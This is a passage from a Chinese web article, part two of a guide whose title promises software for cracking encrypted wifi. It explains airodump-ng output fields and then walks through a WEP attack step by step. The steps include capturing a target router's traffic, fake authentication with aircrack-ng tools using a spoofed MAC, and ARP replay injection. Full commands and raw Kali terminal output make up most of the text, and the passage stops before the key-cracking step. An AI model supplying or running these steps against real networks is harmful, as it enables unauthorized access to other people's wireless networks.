专破加密wifi的软件推荐 wifi加密了要怎么才能连接得上( 二 )

  • AUTH:使用的认证协议 。常用的有MGT(WPA/WPA2使用独立的认证服务器,平时我们常说的802.1x、radius和eap等)、SKA(WEP的共享密钥)、PSK(WPA/WPA2的预共享密钥)或者OPN(WEP开放式) 。
  • ESSID:指所谓的SSID号 。如果启用隐藏的SSID的话,它可以为空 。这种情况下,airodump-ng试图从proberesponses和associationrequests中获取SSID 。
  • STATION:客户端的MAC地址,包括连上的和想要搜索无线来连接的客户端 。如果客户端没有连接上,就在BSSID下显示“notassociated” 。
  • Rate:表示传输率 。
  • Lost:在过去10秒钟内丢失的数据分组,基于序列号检测 。它意味着从客户端来的数据丢包,每个非管理帧中都有一个序列号字段,把刚接收到的那个帧中的序列号和前一个帧中的序列号一减就能知道丢了几个包 。
  • Frames:客户端发送的数据分组数量 。
  • Probe:被客户端查探的ESSID 。如果客户端正试图连接一个无线,但是没有连接上,那么就显示在这里 。
  • (5)使用airodump-ng捕获指定BSSID的文件 。执行命令如下所示 。
    airodump-ng命令常用的选项如下所示 。
    • -c:指定选择的频道 。
    • -w:指定一个文件名,用于保存捕获的数据 。
    • -bssid:指定攻击的BSSID 。
    下面将Bssid为14:E6:E4:AC:FB:20的无线路由器作为攻击目标 。执行命令如下所示:
    专破加密wifi的软件推荐 wifi加密了要怎么才能连接得上

    文章插图

    从输出的信息中可以看到ESSID为Test无线路由器的#Data一直在变化,表示有客户端正与无线发生数据交换 。以上命令执行成功后,会生成一个名为wirelessattack-01.ivs的文件,而不是wirelessattack.ivs 。这是因为airodump-ng工具为了方便后面破解的时候调用,所有对保存文件按顺序编了号,于是就多了-01这样的序号,以此类推 。在进行第二次攻击时,若使用同样文件名wirelessattack保存的话,就会生成名为wirelessattack-02.ivs文件 。
    (6)打开一个新的终端窗口,运行aireplay命令 。aireplay命令的语法格式如下所示:
    aireplay-ng -1 0 -a [BSSID] -h [our Chosen MAC address] -e [ESSID] [Interface]aireplay-ng -dauth 1 -a [BSSID] -c [our Chosen MAC address] [Interface]启动aireplay,执行命令如下所示:
    root@kali:~# aireplay-ng -1 0 -a 14:E6:E4:AC:FB:20 -h 00:11:22:33:44:55 -e Test mon0The interface MAC (00:C1:40:76:05:6C) doesn\'t match the specified MAC (-h).ifconfig mon0 hw ether 00:11:22:33:44:5517:25:17 Waiting for beacon frame (BSSID: 14:E6:E4:AC:FB:20) on channel 117:25:17 Sending Authentication Request (Open System) [ACK]17:25:17 Switching to shared key authentication17:25:19 Sending Authentication Request (Shared Key) [ACK]17:25:19 Switching to shared key authentication17:25:21 Sending Authentication Request (Shared Key) [ACK]17:25:21 Switching to shared key authentication17:25:23 Sending Authentication Request (Shared Key) [ACK]17:25:23 Switching to shared key authentication17:25:25 Sending Authentication Request (Shared Key) [ACK]17:25:25 Switching to shared key authentication17:25:27 Sending Authentication Request (Shared Key) [ACK]17:25:27 Switching to shared key authentication17:25:29 Sending Authentication Request (Shared Key) [ACK]17:25:29 Switching to shared key authentication(7)使用aireplay发送一些流量给无线路由器,以至于能够捕获到数据 。语法格式如下所示:
    aireplay-ng 3 -b [BSSID] -h [Our chosen MAC address] [Interface]执行命令如下所示:
    root@kali:~# aireplay-ng -3 -b 14:E6:E4:AC:FB:20 -h 00:11:22:33:44:55 mon0The interface MAC (00:C1:40:76:05:6C) doesn\'t match the specified MAC (-h).ifconfig mon0 hw ether 00:11:22:33:44:5517:26:54 Waiting for beacon frame (BSSID: 14:E6:E4:AC:FB:20) on channel 1Saving ARP requests in replay_arp-0515-172654.capYou should also start airodump-ng to capture replies.Notice: got a deauth/disassoc packet. Is the source MAC associated ?Read 1259 packets (got 1 ARP requests and 189 ACKs), sent 198 packets…(499 ppsRead 1547 packets (got 1 ARP requests and 235 ACKs), sent 248 packets…(499 ppsRead 1843 packets (got 1 ARP requests and 285 ACKs), sent 298 packets…(499 ppsRead 2150 packets (got 1 ARP requests and 333 ACKs), sent 348 packets…(499 ppsRead 2446 packets (got 1 ARP requests and 381 ACKs), sent 398 packets…(499 ppsRead 2753 packets (got 1 ARP requests and 430 ACKs), sent 449 packets…(500 ppsRead 3058 packets (got 1 ARP requests and 476 ACKs), sent 499 packets…(500 ppsRead 3367 packets (got 1 ARP requests and 525 ACKs), sent 548 packets…(499 ppsRead 3687 packets (got 1 ARP requests and 576 ACKs), sent 598 packets…(499 ppsRead 4001 packets (got 1 ARP requests and 626 ACKs), sent 649 packets…(500 ppsRead 4312 packets (got 1 ARP requests and 674 ACKs), sent 699 packets…(500 ppsRead 4622 packets (got 1 ARP requests and 719 ACKs), sent 749 packets…(500 ppsRead 4929 packets (got 1 ARP requests and 768 ACKs), sent 798 packets…(499 ppsRead 5239 packets (got 1 ARP requests and 817 ACKs), sent 848 packets…(499 pps